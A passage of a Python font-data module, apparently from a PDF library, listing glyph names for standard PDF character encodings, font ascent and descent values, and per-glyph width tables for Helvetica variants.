if y[-8:]=='encoding': y = y[:-8]
y = self._XMap[y]
return self.data[y]
encodings = _Name2StandardEncodingMap()
encodings['WinAnsiEncoding'] = (
None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, 'space', 'exclam',
'quotedbl', 'numbersign', 'dollar', 'percent', 'ampersand',
'quotesingle', 'parenleft', 'parenright', 'asterisk', 'plus', 'comma',
'hyphen', 'period', 'slash', 'zero', 'one', 'two', 'three', 'four',
'five', 'six', 'seven', 'eight', 'nine', 'colon', 'semicolon', 'less',
'equal', 'greater', 'question', 'at', 'A', 'B', 'C', 'D', 'E', 'F',
'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',
'U', 'V', 'W', 'X', 'Y', 'Z', 'bracketleft', 'backslash', 'bracketright',
'asciicircum', 'underscore', 'grave', 'a', 'b', 'c', 'd', 'e', 'f',
'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u', 'v', 'w', 'x', 'y', 'z', 'braceleft', 'bar', 'braceright',
'asciitilde', 'bullet', 'Euro', 'bullet', 'quotesinglbase', 'florin',
'quotedblbase', 'ellipsis', 'dagger', 'daggerdbl', 'circumflex',
'perthousand', 'Scaron', 'guilsinglleft', 'OE', 'bullet', 'Zcaron',
'bullet', 'bullet', 'quoteleft', 'quoteright', 'quotedblleft',
'quotedblright', 'bullet', 'endash', 'emdash', 'tilde', 'trademark',
'scaron', 'guilsinglright', 'oe', 'bullet', 'zcaron', 'Ydieresis',
'space', 'exclamdown', 'cent', 'sterling', 'currency', 'yen', 'brokenbar',
'section', 'dieresis', 'copyright', 'ordfeminine', 'guillemotleft',
'logicalnot', 'hyphen', 'registered', 'macron', 'degree', 'plusminus',
'twosuperior', 'threesuperior', 'acute', 'mu', 'paragraph', 'periodcentered',
'cedilla', 'onesuperior', 'ordmasculine', 'guillemotright', 'onequarter',
'onehalf', 'threequarters', 'questiondown', 'Agrave', 'Aacute',
'Acircumflex', 'Atilde', 'Adieresis', 'Aring', 'AE', 'Ccedilla',
'Egrave', 'Eacute', 'Ecircumflex', 'Edieresis', 'Igrave', 'Iacute',
'Icircumflex', 'Idieresis', 'Eth', 'Ntilde', 'Ograve', 'Oacute',
'Ocircumflex', 'Otilde', 'Odieresis', 'multiply', 'Oslash', 'Ugrave',
'Uacute', 'Ucircumflex', 'Udieresis', 'Yacute', 'Thorn', 'germandbls',
'agrave', 'aacute', 'acircumflex', 'atilde', 'adieresis', 'aring', 'ae',
'ccedilla', 'egrave', 'eacute', 'ecircumflex', 'edieresis', 'igrave',
'iacute', 'icircumflex', 'idieresis', 'eth', 'ntilde', 'ograve', 'oacute',
'ocircumflex', 'otilde', 'odieresis', 'divide', 'oslash', 'ugrave', 'uacute',
'ucircumflex', 'udieresis', 'yacute', 'thorn', 'ydieresis')
encodings['MacRomanEncoding'] = (
None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, 'space', 'exclam',
'quotedbl', 'numbersign', 'dollar', 'percent', 'ampersand',
'quotesingle', 'parenleft', 'parenright', 'asterisk', 'plus', 'comma',
'hyphen', 'period', 'slash', 'zero', 'one', 'two', 'three', 'four',
'five', 'six', 'seven', 'eight', 'nine', 'colon', 'semicolon', 'less',
'equal', 'greater', 'question', 'at', 'A', 'B', 'C', 'D', 'E', 'F',
'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',
'U', 'V', 'W', 'X', 'Y', 'Z', 'bracketleft', 'backslash', 'bracketright',
'asciicircum', 'underscore', 'grave', 'a', 'b', 'c', 'd', 'e', 'f',
'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u', 'v', 'w', 'x', 'y', 'z', 'braceleft', 'bar', 'braceright',
'asciitilde', None, 'Adieresis', 'Aring', 'Ccedilla', 'Eacute',
'Ntilde', 'Odieresis', 'Udieresis', 'aacute', 'agrave', 'acircumflex',
'adieresis', 'atilde', 'aring', 'ccedilla', 'eacute', 'egrave',
'ecircumflex', 'edieresis', 'iacute', 'igrave', 'icircumflex',
'idieresis', 'ntilde', 'oacute', 'ograve', 'ocircumflex', 'odieresis',
'otilde', 'uacute', 'ugrave', 'ucircumflex', 'udieresis', 'dagger',
'degree', 'cent', 'sterling', 'section', 'bullet', 'paragraph',
'germandbls', 'registered', 'copyright', 'trademark', 'acute',
'dieresis', None, 'AE', 'Oslash', None, 'plusminus', None, None, 'yen',
'mu', None, None, None, None, None, 'ordfeminine', 'ordmasculine', None,
'ae', 'oslash', 'questiondown', 'exclamdown', 'logicalnot', None, 'florin',
None, None, 'guillemotleft', 'guillemotright', 'ellipsis', 'space', 'Agrave',
'Atilde', 'Otilde', 'OE', 'oe', 'endash', 'emdash', 'quotedblleft',
'quotedblright', 'quoteleft', 'quoteright', 'divide', None, 'ydieresis',
'Ydieresis', 'fraction', 'currency', 'guilsinglleft', 'guilsinglright',
'fi', 'fl', 'daggerdbl', 'periodcentered', 'quotesinglbase',
'quotedblbase', 'perthousand', 'Acircumflex', 'Ecircumflex', 'Aacute',
'Edieresis', 'Egrave', 'Iacute', 'Icircumflex', 'Idieresis', 'Igrave',
'Oacute', 'Ocircumflex', None, 'Ograve', 'Uacute', 'Ucircumflex',
'Ugrave', 'dotlessi', 'circumflex', 'tilde', 'macron', 'breve',
'dotaccent', 'ring', 'cedilla', 'hungarumlaut', 'ogonek', 'caron')
encodings['SymbolEncoding']=(None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, 'space',
'exclam', 'universal', 'numbersign', 'existential', 'percent', 'ampersand', 'suchthat',
'parenleft', 'parenright', 'asteriskmath', 'plus', 'comma', 'minus', 'period', 'slash', 'zero',
'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'colon', 'semicolon',
'less', 'equal', 'greater', 'question', 'congruent', 'Alpha', 'Beta', 'Chi', 'Delta', 'Epsilon',
'Phi', 'Gamma', 'Eta', 'Iota', 'theta1', 'Kappa', 'Lambda', 'Mu', 'Nu', 'Omicron', 'Pi', 'Theta',
'Rho', 'Sigma', 'Tau', 'Upsilon', 'sigma1', 'Omega', 'Xi', 'Psi', 'Zeta', 'bracketleft',
'therefore', 'bracketright', 'perpendicular', 'underscore', 'radicalex', 'alpha', 'beta', 'chi',
'delta', 'epsilon', 'phi', 'gamma', 'eta', 'iota', 'phi1', 'kappa', 'lambda', 'mu', 'nu',
'omicron', 'pi', 'theta', 'rho', 'sigma', 'tau', 'upsilon', 'omega1', 'omega', 'xi', 'psi', 'zeta',
'braceleft', 'bar', 'braceright', 'similar', None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, 'Euro', 'Upsilon1', 'minute', 'lessequal',
'fraction', 'infinity', 'florin', 'club', 'diamond', 'heart', 'spade', 'arrowboth', 'arrowleft',
'arrowup', 'arrowright', 'arrowdown', 'degree', 'plusminus', 'second', 'greaterequal', 'multiply',
'proportional', 'partialdiff', 'bullet', 'divide', 'notequal', 'equivalence', 'approxequal',
'ellipsis', 'arrowvertex', 'arrowhorizex', 'carriagereturn', 'aleph', 'Ifraktur', 'Rfraktur',
'weierstrass', 'circlemultiply', 'circleplus', 'emptyset', 'intersection', 'union',
'propersuperset', 'reflexsuperset', 'notsubset', 'propersubset', 'reflexsubset', 'element',
'notelement', 'angle', 'gradient', 'registerserif', 'copyrightserif', 'trademarkserif', 'product',
'radical', 'dotmath', 'logicalnot', 'logicaland', 'logicalor', 'arrowdblboth', 'arrowdblleft',
'arrowdblup', 'arrowdblright', 'arrowdbldown', 'lozenge', 'angleleft', 'registersans',
'copyrightsans', 'trademarksans', 'summation', 'parenlefttp', 'parenleftex', 'parenleftbt',
'bracketlefttp', 'bracketleftex', 'bracketleftbt', 'bracelefttp', 'braceleftmid', 'braceleftbt',
'braceex', None, 'angleright', 'integral', 'integraltp', 'integralex', 'integralbt',
'parenrighttp', 'parenrightex', 'parenrightbt', 'bracketrighttp', 'bracketrightex',
'bracketrightbt', 'bracerighttp', 'bracerightmid', 'bracerightbt', None)
encodings['ZapfDingbatsEncoding'] = ( None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,
'space', 'a1', 'a2', 'a202', 'a3', 'a4', 'a5', 'a119', 'a118', 'a117', 'a11', 'a12', 'a13', 'a14',
'a15', 'a16', 'a105', 'a17', 'a18', 'a19', 'a20', 'a21', 'a22', 'a23', 'a24', 'a25', 'a26', 'a27',
'a28', 'a6', 'a7', 'a8', 'a9', 'a10', 'a29', 'a30', 'a31', 'a32', 'a33', 'a34', 'a35', 'a36',
'a37', 'a38', 'a39', 'a40', 'a41', 'a42', 'a43', 'a44', 'a45', 'a46', 'a47', 'a48', 'a49', 'a50',
'a51', 'a52', 'a53', 'a54', 'a55', 'a56', 'a57', 'a58', 'a59', 'a60', 'a61', 'a62', 'a63', 'a64',
'a65', 'a66', 'a67', 'a68', 'a69', 'a70', 'a71', 'a72', 'a73', 'a74', 'a203', 'a75', 'a204', 'a76',
'a77', 'a78', 'a79', 'a81', 'a82', 'a83', 'a84', 'a97', 'a98', 'a99', 'a100', None, 'a89', 'a90',
'a93', 'a94', 'a91', 'a92', 'a205', 'a85', 'a206', 'a86', 'a87', 'a88', 'a95', 'a96', None, None,
None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,
None, 'a101', 'a102', 'a103', 'a104', 'a106', 'a107', 'a108', 'a112', 'a111', 'a110', 'a109',
'a120', 'a121', 'a122', 'a123', 'a124', 'a125', 'a126', 'a127', 'a128', 'a129', 'a130', 'a131',
'a132', 'a133', 'a134', 'a135', 'a136', 'a137', 'a138', 'a139', 'a140', 'a141', 'a142', 'a143',
'a144', 'a145', 'a146', 'a147', 'a148', 'a149', 'a150', 'a151', 'a152', 'a153', 'a154', 'a155',
'a156', 'a157', 'a158', 'a159', 'a160', 'a161', 'a163', 'a164', 'a196', 'a165', 'a192', 'a166',
'a167', 'a168', 'a169', 'a170', 'a171', 'a172', 'a173', 'a162', 'a174', 'a175', 'a176', 'a177',
'a178', 'a179', 'a193', 'a180', 'a199', 'a181', 'a200', 'a182', None, 'a201', 'a183', 'a184',
'a197', 'a185', 'a194', 'a198', 'a186', 'a195', 'a187', 'a188', 'a189', 'a190', 'a191', None)
encodings['StandardEncoding']=(None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,"space","exclam",
"quotedbl","numbersign","dollar","percent","ampersand","quoteright","parenleft","parenright","asterisk","plus",
"comma","hyphen","period","slash","zero","one","two","three","four","five","six","seven","eight","nine","colon",
"semicolon","less","equal","greater","question","at","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O",
"P","Q","R","S","T","U","V","W","X","Y","Z","bracketleft","backslash","bracketright","asciicircum","underscore",
"quoteleft","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y",
"z","braceleft","bar","braceright","asciitilde",None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,
None,None,None,"exclamdown","cent","sterling","fraction","yen","florin","section","currency","quotesingle","quotedblleft",
"guillemotleft","guilsinglleft","guilsinglright","fi","fl",None,"endash","dagger","daggerdbl","periodcentered",None,
"paragraph","bullet","quotesinglbase","quotedblbase","quotedblright","guillemotright","ellipsis","perthousand",
None,"questiondown",None,"grave","acute","circumflex","tilde","macron","breve","dotaccent","dieresis",None,"ring",
"cedilla",None,"hungarumlaut","ogonek","caron","emdash",None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,"AE",None,"ordfeminine",
None,None,None,None,"Lslash","Oslash","OE","ordmasculine",None,None,None,None,None,"ae",None,None,None,"dotlessi",None,None,"lslash","oslash",
"oe","germandbls",None,None,None,None)
encodings['PDFDocEncoding']=(None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,
None,None,None,None,None,"breve","caron","circumflex",
"dotaccent","hungarumlaut","ogonek","ring","tilde","space","exclam","quotedbl","numbersign","dollar","percent",
"ampersand","quotesingle","parenleft","parenright","asterisk","plus","comma","hyphen","period","slash","zero",
"one","two","three","four","five","six","seven","eight","nine","colon","semicolon","less","equal","greater",
"question","at","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X",
"Y","Z","bracketleft","backslash","bracketright","asciicircum","underscore","grave","a","b","c","d","e","f","g",
"h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","braceleft","bar","braceright",
"asciitilde",None,"bullet","dagger","daggerdbl","ellipsis","emdash","endash","florin","fraction","guilsinglleft",
"guilsinglright","minus","perthousand","quotedblbase","quotedblleft","quotedblright","quoteleft","quoteright",
"quotesinglbase","trademark","fi","fl","Lslash","OE","Scaron","Ydieresis","Zcaron","dotlessi","lslash","oe",
"scaron","zcaron",None,"Euro","exclamdown","cent","sterling","currency","yen","brokenbar","section","dieresis",
"copyright","ordfeminine","guillemotleft","logicalnot",None,"registered","macron","degree","plusminus","twosuperior",
"threesuperior","acute","mu","paragraph","periodcentered","cedilla","onesuperior","ordmasculine","guillemotright",
"onequarter","onehalf","threequarters","questiondown","Agrave","Aacute","Acircumflex","Atilde","Adieresis","Aring",
"AE","Ccedilla","Egrave","Eacute","Ecircumflex","Edieresis","Igrave","Iacute","Icircumflex","Idieresis","Eth",
"Ntilde","Ograve","Oacute","Ocircumflex","Otilde","Odieresis","multiply","Oslash","Ugrave","Uacute","Ucircumflex",
"Udieresis","Yacute","Thorn","germandbls","agrave","aacute","acircumflex","atilde","adieresis","aring","ae",
"ccedilla","egrave","eacute","ecircumflex","edieresis","igrave","iacute","icircumflex","idieresis","eth","ntilde",
"ograve","oacute","ocircumflex","otilde","odieresis","divide","oslash","ugrave","uacute","ucircumflex","udieresis",
"yacute","thorn","ydieresis")
encodings['MacExpertEncoding'] = (None, None, None, None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,
'space', 'exclamsmall', 'Hungarumlautsmall', 'centoldstyle', 'dollaroldstyle', 'dollarsuperior', 'ampersandsmall',
'Acutesmall', 'parenleftsuperior', 'parenrightsuperior', 'twodotenleader', 'onedotenleader', 'comma', 'hyphen',
'period', 'fraction', 'zerooldstyle', 'oneoldstyle', 'twooldstyle', 'threeoldstyle', 'fouroldstyle',
'fiveoldstyle', 'sixoldstyle', 'sevenoldstyle', 'eightoldstyle', 'nineoldstyle', 'colon', 'semicolon', None,
'threequartersemdash', None, 'questionsmall', None, None, None, None, 'Ethsmall', None, None, 'onequarter',
'onehalf', 'threequarters', 'oneeighth', 'threeeighths', 'fiveeighths', 'seveneighths', 'onethird', 'twothirds',
None, None, None, None, None, None, 'ff', 'fi', 'fl', 'ffi', 'ffl', 'parenleftinferior', None,
'parenrightinferior', 'Circumflexsmall', 'hypheninferior', 'Gravesmall', 'Asmall', 'Bsmall', 'Csmall', 'Dsmall',
'Esmall', 'Fsmall', 'Gsmall', 'Hsmall', 'Ismall', 'Jsmall', 'Ksmall', 'Lsmall', 'Msmall', 'Nsmall', 'Osmall',
'Psmall', 'Qsmall', 'Rsmall', 'Ssmall', 'Tsmall', 'Usmall', 'Vsmall', 'Wsmall', 'Xsmall', 'Ysmall', 'Zsmall',
'colonmonetary', 'onefitted', 'rupiah', 'Tildesmall', None, None, 'asuperior', 'centsuperior', None, None, None,
None, 'Aacutesmall', 'Agravesmall', 'Acircumflexsmall', 'Adieresissmall', 'Atildesmall', 'Aringsmall',
'Ccedillasmall', 'Eacutesmall', 'Egravesmall', 'Ecircumflexsmall', 'Edieresissmall', 'Iacutesmall', 'Igravesmall',
'Icircumflexsmall', 'Idieresissmall', 'Ntildesmall', 'Oacutesmall', 'Ogravesmall', 'Ocircumflexsmall',
'Odieresissmall', 'Otildesmall', 'Uacutesmall', 'Ugravesmall', 'Ucircumflexsmall', 'Udieresissmall', None,
'eightsuperior', 'fourinferior', 'threeinferior', 'sixinferior', 'eightinferior', 'seveninferior', 'Scaronsmall',
None, 'centinferior', 'twoinferior', None, 'Dieresissmall', None, 'Caronsmall', 'osuperior', 'fiveinferior', None,
'commainferior', 'periodinferior', 'Yacutesmall', None, 'dollarinferior', None, None, 'Thornsmall', None,
'nineinferior', 'zeroinferior', 'Zcaronsmall', 'AEsmall', 'Oslashsmall', 'questiondownsmall', 'oneinferior',
'Lslashsmall', None, None, None, None, None, None, 'Cedillasmall', None, None, None, None, None, 'OEsmall',
'figuredash', 'hyphensuperior', None, None, None, None, 'exclamdownsmall', None, 'Ydieresissmall', None,
'onesuperior', 'twosuperior', 'threesuperior', 'foursuperior', 'fivesuperior', 'sixsuperior', 'sevensuperior',
'ninesuperior', 'zerosuperior', None, 'esuperior', 'rsuperior', 'tsuperior', None, None, 'isuperior', 'ssuperior',
'dsuperior', None, None, None, None, None, 'lsuperior', 'Ogoneksmall', 'Brevesmall', 'Macronsmall', 'bsuperior',
'nsuperior', 'msuperior', 'commasuperior', 'periodsuperior', 'Dotaccentsmall', 'Ringsmall', None, None, None, None)
ascent_descent = {
'Courier': (629, -157),
'Courier-Bold': (626, -142),
'Courier-BoldOblique': (626, -142),
'Courier-Oblique': (629, -157),
'Helvetica': (718, -207),
'Helvetica-Bold': (718, -207),
'Helvetica-BoldOblique': (718, -207),
'Helvetica-Oblique': (718, -207),
'Times-Roman': (683, -217),
'Times-Bold': (676, -205),
'Times-BoldItalic': (699, -205),
'Times-Italic': (683, -205),
'Symbol': (0, 0),
'ZapfDingbats': (0, 0)
}
widthsByFontGlyph = {}
widthsByFontGlyph['Helvetica'] = {'A': 667,
'AE': 1000,
'Aacute': 667,
'Acircumflex': 667,
'Adieresis': 667,
'Agrave': 667,
'Aring': 667,
'Atilde': 667,
'B': 667,
'C': 722,
'Ccedilla': 722,
'D': 722,
'E': 667,
'Eacute': 667,
'Ecircumflex': 667,
'Edieresis': 667,
'Egrave': 667,
'Eth': 722,
'Euro': 556,
'F': 611,
'G': 778,
'H': 722,
'I': 278,
'Iacute': 278,
'Icircumflex': 278,
'Idieresis': 278,
'Igrave': 278,
'J': 500,
'K': 667,
'L': 556,
'Lslash': 556,
'M': 833,
'N': 722,
'Ntilde': 722,
'O': 778,
'OE': 1000,
'Oacute': 778,
'Ocircumflex': 778,
'Odieresis': 778,
'Ograve': 778,
'Oslash': 778,
'Otilde': 778,
'P': 667,
'Q': 778,
'R': 722,
'S': 667,
'Scaron': 667,
'T': 611,
'Thorn': 667,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 667,
'W': 944,
'X': 667,
'Y': 667,
'Yacute': 667,
'Ydieresis': 667,
'Z': 611,
'Zcaron': 611,
'a': 556,
'aacute': 556,
'acircumflex': 556,
'acute': 333,
'adieresis': 556,
'ae': 889,
'agrave': 556,
'ampersand': 667,
'aring': 556,
'asciicircum': 469,
'asciitilde': 584,
'asterisk': 389,
'at': 1015,
'atilde': 556,
'b': 556,
'backslash': 278,
'bar': 260,
'braceleft': 334,
'braceright': 334,
'bracketleft': 278,
'bracketright': 278,
'breve': 333,
'brokenbar': 260,
'bullet': 350,
'c': 500,
'caron': 333,
'ccedilla': 500,
'cedilla': 333,
'cent': 556,
'circumflex': 333,
'colon': 278,
'comma': 278,
'copyright': 737,
'currency': 556,
'd': 556,
'dagger': 556,
'daggerdbl': 556,
'degree': 400,
'dieresis': 333,
'divide': 584,
'dollar': 556,
'dotaccent': 333,
'dotlessi': 278,
'e': 556,
'eacute': 556,
'ecircumflex': 556,
'edieresis': 556,
'egrave': 556,
'eight': 556,
'ellipsis': 1000,
'emdash': 1000,
'endash': 556,
'equal': 584,
'eth': 556,
'exclam': 278,
'exclamdown': 333,
'f': 278,
'fi': 500,
'five': 556,
'fl': 500,
'florin': 556,
'four': 556,
'fraction': 167,
'g': 556,
'germandbls': 611,
'grave': 333,
'greater': 584,
'guillemotleft': 556,
'guillemotright': 556,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 556,
'hungarumlaut': 333,
'hyphen': 333,
'i': 222,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 222,
'k': 500,
'l': 222,
'less': 584,
'logicalnot': 584,
'lslash': 222,
'm': 833,
'macron': 333,
'minus': 584,
'mu': 556,
'multiply': 584,
'n': 556,
'nine': 556,
'ntilde': 556,
'numbersign': 556,
'o': 556,
'oacute': 556,
'ocircumflex': 556,
'odieresis': 556,
'oe': 944,
'ogonek': 333,
'ograve': 556,
'one': 556,
'onehalf': 834,
'onequarter': 834,
'onesuperior': 333,
'ordfeminine': 370,
'ordmasculine': 365,
'oslash': 611,
'otilde': 556,
'p': 556,
'paragraph': 537,
'parenleft': 333,
'parenright': 333,
'percent': 889,
'period': 278,
'periodcentered': 278,
'perthousand': 1000,
'plus': 584,
'plusminus': 584,
'q': 556,
'question': 556,
'questiondown': 611,
'quotedbl': 355,
'quotedblbase': 333,
'quotedblleft': 333,
'quotedblright': 333,
'quoteleft': 222,
'quoteright': 222,
'quotesinglbase': 222,
'quotesingle': 191,
'r': 333,
'registered': 737,
'ring': 333,
's': 500,
'scaron': 500,
'section': 556,
'semicolon': 278,
'seven': 556,
'six': 556,
'slash': 278,
'space': 278,
'sterling': 556,
't': 278,
'thorn': 556,
'three': 556,
'threequarters': 834,
'threesuperior': 333,
'tilde': 333,
'trademark': 1000,
'two': 556,
'twosuperior': 333,
'u': 556,
'uacute': 556,
'ucircumflex': 556,
'udieresis': 556,
'ugrave': 556,
'underscore': 556,
'v': 500,
'w': 722,
'x': 500,
'y': 500,
'yacute': 500,
'ydieresis': 500,
'yen': 556,
'z': 500,
'zcaron': 500,
'zero': 556}
widthsByFontGlyph['Helvetica-Bold'] = {'A': 722,
'AE': 1000,
'Aacute': 722,
'Acircumflex': 722,
'Adieresis': 722,
'Agrave': 722,
'Aring': 722,
'Atilde': 722,
'B': 722,
'C': 722,
'Ccedilla': 722,
'D': 722,
'E': 667,
'Eacute': 667,
'Ecircumflex': 667,
'Edieresis': 667,
'Egrave': 667,
'Eth': 722,
'Euro': 556,
'F': 611,
'G': 778,
'H': 722,
'I': 278,
'Iacute': 278,
'Icircumflex': 278,
'Idieresis': 278,
'Igrave': 278,
'J': 556,
'K': 722,
'L': 611,
'Lslash': 611,
'M': 833,
'N': 722,
'Ntilde': 722,
'O': 778,
'OE': 1000,
'Oacute': 778,
'Ocircumflex': 778,
'Odieresis': 778,
'Ograve': 778,
'Oslash': 778,
'Otilde': 778,
'P': 667,
'Q': 778,
'R': 722,
'S': 667,
'Scaron': 667,
'T': 611,
'Thorn': 667,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 667,
'W': 944,
'X': 667,
'Y': 667,
'Yacute': 667,
'Ydieresis': 667,
'Z': 611,
'Zcaron': 611,
'a': 556,
'aacute': 556,
'acircumflex': 556,
'acute': 333,
'adieresis': 556,
'ae': 889,
'agrave': 556,
'ampersand': 722,
'aring': 556,
'asciicircum': 584,
'asciitilde': 584,
'asterisk': 389,
'at': 975,
'atilde': 556,
'b': 611,
'backslash': 278,
'bar': 280,
'braceleft': 389,
'braceright': 389,
'bracketleft': 333,
'bracketright': 333,
'breve': 333,
'brokenbar': 280,
'bullet': 350,
'c': 556,
'caron': 333,
'ccedilla': 556,
'cedilla': 333,
'cent': 556,
'circumflex': 333,
'colon': 333,
'comma': 278,
'copyright': 737,
'currency': 556,
'd': 611,
'dagger': 556,
'daggerdbl': 556,
'degree': 400,
'dieresis': 333,
'divide': 584,
'dollar': 556,
'dotaccent': 333,
'dotlessi': 278,
'e': 556,
'eacute': 556,
'ecircumflex': 556,
'edieresis': 556,
'egrave': 556,
'eight': 556,
'ellipsis': 1000,
'emdash': 1000,
'endash': 556,
'equal': 584,
'eth': 611,
'exclam': 333,
'exclamdown': 333,
'f': 333,
'fi': 611,
'five': 556,
'fl': 611,
'florin': 556,
'four': 556,
'fraction': 167,
'g': 611,
'germandbls': 611,
'grave': 333,
'greater': 584,
'guillemotleft': 556,
'guillemotright': 556,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 611,
'hungarumlaut': 333,
'hyphen': 333,
'i': 278,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 278,
'k': 556,
'l': 278,
'less': 584,
'logicalnot': 584,
'lslash': 278,
'm': 889,
'macron': 333,
'minus': 584,
'mu': 611,
'multiply': 584,
'n': 611,
'nine': 556,
'ntilde': 611,
'numbersign': 556,
'o': 611,
'oacute': 611,
'ocircumflex': 611,
'odieresis': 611,
'oe': 944,
'ogonek': 333,
'ograve': 611,
'one': 556,
'onehalf': 834,
'onequarter': 834,
'onesuperior': 333,
'ordfeminine': 370,
'ordmasculine': 365,
'oslash': 611,
'otilde': 611,
'p': 611,
'paragraph': 556,
'parenleft': 333,
'parenright': 333,
'percent': 889,
'period': 278,
'periodcentered': 278,
'perthousand': 1000,
'plus': 584,
'plusminus': 584,
'q': 611,
'question': 611,
'questiondown': 611,
'quotedbl': 474,
'quotedblbase': 500,
'quotedblleft': 500,
'quotedblright': 500,
'quoteleft': 278,
'quoteright': 278,
'quotesinglbase': 278,
'quotesingle': 238,
'r': 389,
'registered': 737,
'ring': 333,
's': 556,
'scaron': 556,
'section': 556,
'semicolon': 333,
'seven': 556,
'six': 556,
'slash': 278,
'space': 278,
'sterling': 556,
't': 333,
'thorn': 611,
'three': 556,
'threequarters': 834,
'threesuperior': 333,
'tilde': 333,
'trademark': 1000,
'two': 556,
'twosuperior': 333,
'u': 611,
'uacute': 611,
'ucircumflex': 611,
'udieresis': 611,
'ugrave': 611,
'underscore': 556,
'v': 556,
'w': 778,
'x': 556,
'y': 556,
'yacute': 556,
'ydieresis': 556,
'yen': 556,
'z': 500,
'zcaron': 500,
'zero': 556}
widthsByFontGlyph['Helvetica-Oblique'] = {'A': 667,
'AE': 1000,
'Aacute': 667,
'Acircumflex': 667,
'Adieresis': 667,
'Agrave': 667,
'Aring': 667,
'Atilde': 667,
'B': 667,
'C': 722,
'Ccedilla': 722,
'D': 722,
'E': 667,
'Eacute': 667,
'Ecircumflex': 667,
'Edieresis': 667,
'Egrave': 667,
'Eth': 722,
'Euro': 556,
'F': 611,
'G': 778,
'H': 722,
'I': 278,
'Iacute': 278,
'Icircumflex': 278,
'Idieresis': 278,
'Igrave': 278,
'J': 500,
'K': 667,
'L': 556,
'Lslash': 556,
'M': 833,
'N': 722,
'Ntilde': 722,
'O': 778,
'OE': 1000,
'Oacute': 778,
'Ocircumflex': 778,
'Odieresis': 778,
'Ograve': 778,
'Oslash': 778,
'Otilde': 778,
'P': 667,
'Q': 778,
'R': 722,
'S': 667,
'Scaron': 667,
'T': 611,
'Thorn': 667,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 667,
'W': 944,
'X': 667,
'Y': 667,
'Yacute': 667,
'Ydieresis': 667,
'Z': 611,
'Zcaron': 611,
'a': 556,
'aacute': 556,
'acircumflex': 556,
'acute': 333,
'adieresis': 556,
'ae': 889,
'agrave': 556,
'ampersand': 667,
'aring': 556,
'asciicircum': 469,
'asciitilde': 584,
'asterisk': 389,
'at': 1015,
'atilde': 556,
'b': 556,
'backslash': 278,
'bar': 260,
'braceleft': 334,
'braceright': 334,
'bracketleft': 278,
'bracketright': 278,
'breve': 333,
'brokenbar': 260,
'bullet': 350,
'c': 500,
'caron': 333,
'ccedilla': 500,
'cedilla': 333,
'cent': 556,
'circumflex': 333,
'colon': 278,
'comma': 278,
'copyright': 737,
'currency': 556,
'd': 556,
'dagger': 556,
'daggerdbl': 556,
'degree': 400,
'dieresis': 333,
'divide': 584,
'dollar': 556,
'dotaccent': 333,
'dotlessi': 278,
'e': 556,
'eacute': 556,
'ecircumflex': 556,
'edieresis': 556,
'egrave': 556,
'eight': 556,
'ellipsis': 1000,
'emdash': 1000,
'endash': 556,
'equal': 584,
'eth': 556,
'exclam': 278,
'exclamdown': 333,
'f': 278,
'fi': 500,
'five': 556,
'fl': 500,
'florin': 556,
'four': 556,
'fraction': 167,
'g': 556,
'germandbls': 611,
'grave': 333,
'greater': 584,
'guillemotleft': 556,
'guillemotright': 556,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 556,
'hungarumlaut': 333,
'hyphen': 333,
'i': 222,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 222,
'k': 500,
'l': 222,
'less': 584,
'logicalnot': 584,
'lslash': 222,
'm': 833,
'macron': 333,
'minus': 584,
'mu': 556,
'multiply': 584,
'n': 556,
'nine': 556,
'ntilde': 556,
'numbersign': 556,
'o': 556,
'oacute': 556,
'ocircumflex': 556,
'odieresis': 556,
'oe': 944,
'ogonek': 333,
'ograve': 556,
'one': 556,
'onehalf': 834,
'onequarter': 834,
'onesuperior': 333,
'ordfeminine': 370,
'ordmasculine': 365,
'oslash': 611,
'otilde': 556,
'p': 556,
'paragraph': 537,
'parenleft': 333,
'parenright': 333,
'percent': 889,
'period': 278,
'periodcentered': 278,
'perthousand': 1000,
'plus': 584,
'plusminus': 584,
'q': 556,
'question': 556,
'questiondown': 611,
